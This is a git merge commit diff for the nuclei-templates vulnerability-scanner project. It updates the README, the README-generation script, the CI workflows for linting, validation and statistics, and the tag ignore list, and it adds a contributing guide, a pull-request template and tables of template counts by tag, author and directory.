Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/1241
commit
5767a0d5a2
|
@ -3,7 +3,7 @@ f"""
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -18,30 +18,27 @@ Nuclei Templates
|
|||
<a href="#-contributions">Contributions</a> •
|
||||
<a href="#-discussion">Discussion</a> •
|
||||
<a href="#-community">Community</a> •
|
||||
<a href="https://discord.gg/KECAGdH">Join Discord</a>
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
|
||||
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
|
||||
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
|
||||
| default-logins | {countTpl("default-logins/*")} | exposed-tokens | {countTpl("exposed-tokens/*")} | dns | {countTpl("dns")} |
|
||||
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
|
||||
{get_top10()}
|
||||
|
||||
**{command("tree", -2, None)}**.
|
||||
|
||||
|
@ -49,34 +46,34 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
"""
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
"""
|
||||
|
|
|
@ -8,6 +8,11 @@ def countTpl(path):
|
|||
def command(args, start=None, end=None):
|
||||
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
|
||||
|
||||
def get_top10():
|
||||
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
|
||||
TOP10 = command(["cat", "TOP-10.md"])
|
||||
return HEADER + TOP10 if len(TOP10) > 0 else ""
|
||||
|
||||
if __name__ == "__main__":
|
||||
version = command(["git", "describe", "--tags", "--abbrev=0"])
|
||||
template = eval(open(".github/scripts/README.tmpl", "r").read())
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
name: syntax-checking
|
||||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
|
||||
- name: Setup golang
|
||||
uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.14
|
||||
|
||||
- name: Cache Go
|
||||
id: cache-go
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /home/runner/go
|
||||
key: ${{ runner.os }}-go
|
||||
|
||||
- name: Installing Nuclei
|
||||
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t . -exclude .pre-commit-config.yaml
|
||||
shell: bash
|
|
@ -0,0 +1,63 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Setup golang
|
||||
uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.14
|
||||
|
||||
- name: Installing Template Stats
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/templates-stats
|
||||
shell: bash
|
||||
|
||||
- name: Markdown Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: JSON Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: Top 10 Stats
|
||||
run: |
|
||||
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -1,12 +1,10 @@
|
|||
name: "Auto Update README"
|
||||
name: 📝 Readme Update
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
|
|
@ -8,11 +8,9 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "headless"
|
||||
- "dos"
|
||||
- "iot"
|
||||
- "misc"
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
|
@ -0,0 +1,100 @@
|
|||
# Template Contribution Guidelines
|
||||
|
||||
This documentation contains a set of guidelines to help you during the contribution process.
|
||||
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
|
||||
Thank you for helping out and remember, **no contribution is too small.**
|
||||
|
||||
# Submitting Nuclei Templates 👩💻👨💻
|
||||
|
||||
Below you will find the process and workflow used to review and merge your changes.
|
||||
|
||||
## Step 1 : Find existing templates
|
||||
|
||||
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
|
||||
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
|
||||
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
|
||||
|
||||
## Step 2 : Fork the Project
|
||||
|
||||
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
|
||||
|
||||
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
|
||||
|
||||
```sh
|
||||
git clone https://github.com/<your-username>/nuclei-templates
|
||||
cd nuclei-templates
|
||||
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
|
||||
```
|
||||
|
||||
- If you have already forked the project, update your copy before working.
|
||||
|
||||
```sh
|
||||
git remote update
|
||||
git checkout master
|
||||
git rebase upstream/master
|
||||
```
|
||||
|
||||
## Step 3 : Create your Template Branch
|
||||
|
||||
Create a new branch. Use its name to identify the issue your addressing.
|
||||
|
||||
```sh
|
||||
# It will create a new branch with name template_branch_name and switch to that branch
|
||||
git checkout -b template_branch_name
|
||||
```
|
||||
|
||||
## Step 4 : Create Template and Commit
|
||||
- Create your template.
|
||||
- Add all the files/folders needed.
|
||||
- After you've made changes or completed template creation, add changes to the branch you've just created by:
|
||||
|
||||
```sh
|
||||
# To add all new files to branch template_branch_name
|
||||
git add .
|
||||
```
|
||||
|
||||
- To commit give a descriptive message for the convenience of reveiwer by:
|
||||
|
||||
```sh
|
||||
# This message get associated with all files you have changed
|
||||
git commit -m "Added/Fixed/Updated XXX Template"
|
||||
```
|
||||
|
||||
**NOTE**:
|
||||
|
||||
- A Pull Request should have only one unique template to make it simple for review.
|
||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
||||
|
||||
|
||||
## Step 5 : Push Your Changes
|
||||
|
||||
- Now you are ready to push your template to the remote (forked) repository.
|
||||
- When your work is ready and complies with the project conventions, upload your changes to your fork:
|
||||
|
||||
```sh
|
||||
# To push your work to your remote repository
|
||||
git push -u origin template_branch_name
|
||||
```
|
||||
|
||||
## Step 6 : Pull Request
|
||||
|
||||
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
|
||||
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
|
||||
|
||||
## Need more help?🤔
|
||||
|
||||
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
|
||||
|
||||
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
|
||||
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
|
||||
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
|
||||
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
|
||||
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
|
||||
|
||||
|
||||
## Tip from us😇
|
||||
|
||||
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
||||
- Declare at least two matchers to reduce false positive
|
||||
- Avoid matching words reflected in the URL to reduce false positive
|
||||
- Avoid short word that could be encountered anywhere
|
|
@ -0,0 +1,28 @@
|
|||
### Template / PR Information
|
||||
|
||||
<!-- Explains the information and/or motivation for update or/ creating this templates -->
|
||||
<!-- Please include any reference to your template if available -->
|
||||
|
||||
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
|
||||
- References:
|
||||
|
||||
### Template Validation
|
||||
|
||||
I've validated this template locally?
|
||||
- [ ] YES
|
||||
- [ ] NO
|
||||
|
||||
|
||||
#### Additional Details (leave it blank if not applicable)
|
||||
|
||||
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
|
||||
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
|
||||
<!-- Please do NOT include vulnerable host information in pull requests -->
|
||||
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
|
||||
|
||||
### Additional References:
|
||||
|
||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
|
||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
52
README.md
52
README.md
|
@ -3,7 +3,7 @@
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -18,64 +18,74 @@ Nuclei Templates
|
|||
<a href="#-contributions">Contributions</a> •
|
||||
<a href="#-discussion">Discussion</a> •
|
||||
<a href="#-community">Community</a> •
|
||||
<a href="https://discord.gg/KECAGdH">Join Discord</a>
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 |
|
||||
| takeovers | 67 | exposures | 66 | technologies | 60 |
|
||||
| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 |
|
||||
| default-logins | 21 | exposed-tokens | 9 | dns | 8 |
|
||||
| fuzzing | 7 | helpers | 6 | iot | 11 |
|
||||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
**82 directories, 892 files**.
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
||||
|
||||
**139 directories, 1792 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,684 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
||||
| config | 90 | pussycat0x | 36 | miscellaneous | 27 | | | | |
|
||||
| cve2021 | 88 | ice3man | 26 | network | 27 | | | | |
|
||||
| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | |
|
||||
| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | |
|
||||
| cve2018 | 69 | philippedelteil | 16 | fuzzing | 10 | | | | |
|
||||
| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | |
|
||||
| token | 64 | milo2012 | 14 | headless | 5 | | | | |
|
||||
| apache | 62 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | |
|
||||
| default-login | 51 | techbrunchfr | 13 | | | | | | |
|
||||
| cve2017 | 45 | suman_kar | 12 | | | | | | |
|
||||
| file | 44 | cyllective | 11 | | | | | | |
|
||||
| iot | 44 | righettod | 10 | | | | | | |
|
||||
| unauth | 42 | random_robbie | 10 | | | | | | |
|
||||
| oob | 35 | hackergautam | 9 | | | | | | |
|
||||
| network | 35 | wdahlenb | 9 | | | | | | |
|
||||
| sqli | 34 | melbadry9 | 8 | | | | | | |
|
||||
| oracle | 29 | that_juan_ | 8 | | | | | | |
|
||||
| workflow | 29 | aashiq | 8 | | | | | | |
|
||||
| logs | 29 | iamthefrogy | 8 | | | | | | |
|
||||
| ssrf | 28 | r3dg33k | 8 | | | | | | |
|
||||
| cve2016 | 27 | nadino | 8 | | | | | | |
|
||||
| misc | 27 | harshbothra_ | 7 | | | | | | |
|
||||
| jira | 26 | 0x240x23elu | 7 | | | | | | |
|
||||
| atlassian | 26 | emadshanab | 7 | | | | | | |
|
||||
| disclosure | 25 | techryptic (@tech) | 7 | | | | | | |
|
||||
| listing | 24 | randomstr1ng | 7 | | | | | | |
|
||||
| redirect | 21 | dr_set | 7 | | | | | | |
|
||||
| aem | 19 | oppsec | 7 | | | | | | |
|
||||
| cisco | 18 | kophjager007 | 7 | | | | | | |
|
||||
| sap | 16 | __fazal | 6 | | | | | | |
|
||||
| cve2015 | 16 | caspergn | 6 | | | | | | |
|
||||
| debug | 14 | puzzlepeaches | 6 | | | | | | |
|
||||
| cve2012 | 14 | iamnoooob | 5 | | | | | | |
|
||||
| cve2014 | 13 | ganofins | 5 | | | | | | |
|
||||
| auth-bypass | 13 | panch0r3d | 5 | | | | | | |
|
||||
| struts | 13 | joanbono | 5 | | | | | | |
|
||||
| android | 13 | yanyun | 5 | | | | | | |
|
||||
| misconfig | 13 | pentest_swissky | 5 | | | | | | |
|
||||
| fuzz | 13 | rootxharsh | 5 | | | | | | |
|
||||
| adobe | 12 | xelkomy | 4 | | | | | | |
|
||||
| jenkins | 12 | elsfa7110 | 4 | | | | | | |
|
||||
| cve2011 | 12 | meme-lord | 4 | | | | | | |
|
||||
| dns | 12 | github.com/its0x08 | 4 | | | | | | |
|
||||
| weblogic | 12 | nodauf | 4 | | | | | | |
|
||||
| devops | 11 | e_schultze_ | 4 | | | | | | |
|
||||
| zoho | 11 | fyoorer | 3 | | | | | | |
|
||||
| dlink | 11 | shifacyclewala | 3 | | | | | | |
|
||||
| router | 11 | dudez | 3 | | | | | | |
|
||||
| springboot | 11 | f1tz | 3 | | | | | | |
|
||||
| cve2013 | 10 | mavericknerd | 3 | | | | | | |
|
||||
| php | 10 | thomas_from_offensity | 3 | | | | | | |
|
||||
| magento | 9 | vsh00t | 3 | | | | | | |
|
||||
| ftp | 8 | impramodsargar | 3 | | | | | | |
|
||||
| gitlab | 8 | z3bd | 3 | | | | | | |
|
||||
| aws | 8 | shine | 3 | | | | | | |
|
||||
| rails | 8 | jarijaas | 3 | | | | | | |
|
||||
| airflow | 8 | 0w4ys | 3 | | | | | | |
|
||||
| cnvd | 8 | binaryfigments | 3 | | | | | | |
|
||||
| scada | 7 | tess | 3 | | | | | | |
|
||||
| cve2009 | 7 | _generic_human_ | 3 | | | | | | |
|
||||
| joomla | 7 | yash anand @yashanand155 | 3 | | | | | | |
|
||||
| nginx | 7 | emenalf | 2 | | | | | | |
|
||||
| xxe | 7 | random-robbie | 2 | | | | | | |
|
||||
| vmware | 7 | lotusdll | 2 | | | | | | |
|
||||
| login | 7 | hetroublemakr | 2 | | | | | | |
|
||||
| coldfusion | 6 | unstabl3 | 2 | | | | | | |
|
||||
| google | 6 | koti2 | 2 | | | | | | |
|
||||
| jetty | 6 | bp0lr | 2 | | | | | | |
|
||||
| cms | 6 | moritz nentwig | 2 | | | | | | |
|
||||
| backup | 6 | vavkamil | 2 | | | | | | |
|
||||
| citrix | 6 | manas_harsh | 2 | | | | | | |
|
||||
| api | 6 | amsda | 2 | | | | | | |
|
||||
| rconfig | 6 | nkxxkn | 2 | | | | | | |
|
||||
| dell | 6 | dheerajmadhukar | 2 | | | | | | |
|
||||
| drupal | 5 | pxmme1337 | 2 | | | | | | |
|
||||
| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | |
|
||||
| dedecms | 5 | 0xprial | 2 | | | | | | |
|
||||
| lucee | 5 | ehsahil | 2 | | | | | | |
|
||||
| solr | 5 | incogbyte | 2 | | | | | | |
|
||||
| files | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | |
|
||||
| ibm | 5 | lu4nx | 2 | | | | | | |
|
||||
| django | 5 | w4cky_ | 2 | | | | | | |
|
||||
| circarlife | 5 | hahwul | 2 | | | | | | |
|
||||
| confluence | 5 | 0xsapra | 2 | | | | | | |
|
||||
| netgear | 5 | bing0o | 2 | | | | | | |
|
||||
| fileupload | 5 | davidmckennirey | 2 | | | | | | |
|
||||
| ssti | 5 | ree4pwn | 2 | | | | | | |
|
||||
| headless | 5 | swissky | 2 | | | | | | |
|
||||
| iis | 5 | 0xrudra | 2 | | | | | | |
|
||||
| laravel | 5 | gevakun | 2 | | | | | | |
|
||||
| ruijie | 5 | randomrobbie | 2 | | | | | | |
|
||||
| java | 5 | alifathi-h1 | 2 | | | | | | |
|
||||
| webserver | 4 | 0xelkomy | 2 | | | | | | |
|
||||
| docker | 4 | zomsop82 | 2 | | | | | | |
|
||||
| thinkcmf | 4 | bsysop | 2 | | | | | | |
|
||||
| deserialization | 4 | 0xcrypto | 2 | | | | | | |
|
||||
| elastic | 4 | joeldeleep | 2 | | | | | | |
|
||||
| nodejs | 4 | kiblyn11 | 2 | | | | | | |
|
||||
| artifactory | 4 | afaq | 2 | | | | | | |
|
||||
| vpn | 4 | fabaff | 2 | | | | | | |
|
||||
| thinkphp | 4 | x1m_martijn | 2 | | | | | | |
|
||||
| asp | 4 | foulenzer | 2 | | | | | | |
|
||||
| tomcat | 4 | ooooooo_q | 1 | | | | | | |
|
||||
| solarwinds | 4 | yashgoti | 1 | | | | | | |
|
||||
| moodle | 4 | _darrenmartyn | 1 | | | | | | |
|
||||
| jolokia | 4 | knassar702 | 1 | | | | | | |
|
||||
| traversal | 4 | nytr0gen | 1 | | | | | | |
|
||||
| samsung | 4 | toufik airane | 1 | | | | | | |
|
||||
| crlf | 4 | kabirsuda | 1 | | | | | | |
|
||||
| magmi | 4 | me9187 | 1 | | | | | | |
|
